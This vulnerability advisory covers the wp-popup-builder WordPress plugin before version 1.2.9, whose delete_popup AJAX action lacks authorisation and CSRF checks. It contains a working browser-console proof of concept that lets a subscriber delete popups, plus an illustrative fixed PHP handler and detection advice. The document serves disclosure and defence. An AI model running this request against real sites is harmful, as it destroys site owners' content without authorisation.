The plugin does not have authorisation and CSRF checks in an AJAX action, allowing any authenticated user, such as a subscriber, to delete arbitrary Popups.
Proof of concept (run from the browser console of an authenticated low-privilege user, e.g. a subscriber):

```javascript
// Calls the plugin's admin-ajax action without any nonce; "bid" is the popup id to delete.
fetch('/wordpress/wp-admin/admin-ajax.php?action=delete_popup', {
  method: 'POST',
  headers: { 'content-type': 'application/x-www-form-urlencoded' },
  body: 'bid=1',
})
  .then(response => response.text())
  .then(data => console.log(data));
```
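What a fixed handler for this action looks like, added here as an illustration and not taken from the plugin's code: the hook name `wp_ajax_delete_popup` and the `bid` parameter follow from the PoC above, while the nonce action string `delete_popup_nonce`, the `security` field, the `manage_options` capability, the `popup` post type and all function names are assumptions.

```php
<?php
// Added example (not the plugin's code): an admin-ajax handler for
// action=delete_popup that performs both the CSRF (nonce) check and the
// authorisation check the advisory reports as missing. Names marked
// "assumed" are illustrative, not taken from the plugin.

add_action( 'wp_ajax_delete_popup', 'example_secure_delete_popup' );
// Deliberately no 'wp_ajax_nopriv_delete_popup' hook: unauthenticated
// requests must never reach this action at all.

function example_secure_delete_popup() {
    // 1. CSRF: the request must carry a nonce issued for this action.
    //    check_ajax_referer() terminates the request (wp_die) on failure,
    //    so a cross-site POST like the PoC never reaches the delete.
    check_ajax_referer( 'delete_popup_nonce', 'security' ); // nonce action/field assumed

    // 2. Authorisation: being logged in (a subscriber) is not enough;
    //    require a capability only trusted roles hold (assumed capability).
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Input validation: the popup id must be a positive integer.
    $popup_id = isset( $_POST['bid'] ) ? absint( $_POST['bid'] ) : 0;
    if ( 0 === $popup_id ) {
        wp_send_json_error( array( 'message' => 'Invalid popup id.' ), 400 );
    }

    // 4. Object-level check: only act on the post type the plugin owns
    //    ('popup' is an assumed post type), so the action cannot be used
    //    to delete unrelated posts or pages.
    if ( 'popup' !== get_post_type( $popup_id ) ) {
        wp_send_json_error( array( 'message' => 'Not a popup.' ), 404 );
    }

    $deleted = wp_delete_post( $popup_id, true );
    if ( ! $deleted ) {
        wp_send_json_error( array( 'message' => 'Delete failed.' ), 500 );
    }
    wp_send_json_success( array( 'deleted' => $popup_id ) );
}

// The admin page that triggers the action has to hand a matching nonce to
// its script; the script then posts it in the 'security' field next to 'bid'.
// Script handle and file name are assumed.
function example_enqueue_popup_admin_script() {
    wp_enqueue_script( 'example-popup-admin', plugins_url( 'admin.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'example-popup-admin', 'examplePopup', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'delete_popup_nonce' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'example_enqueue_popup_admin_script' );
```

The two checks address two different failures: the nonce defeats a request forged from another origin, and the capability check defeats a legitimately logged-in low-privilege user. Neither substitutes for the other, which is why the advisory lists both as missing. When reviewing logs for exploitation of the unpatched version, `POST` requests to `admin-ajax.php` with `action=delete_popup` from sessions of non-administrative users are the signal to look for.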
CPE

| Name | Operator | Version |
|---|---|---|
| wp-popup-builder | lt | 1.2.9 |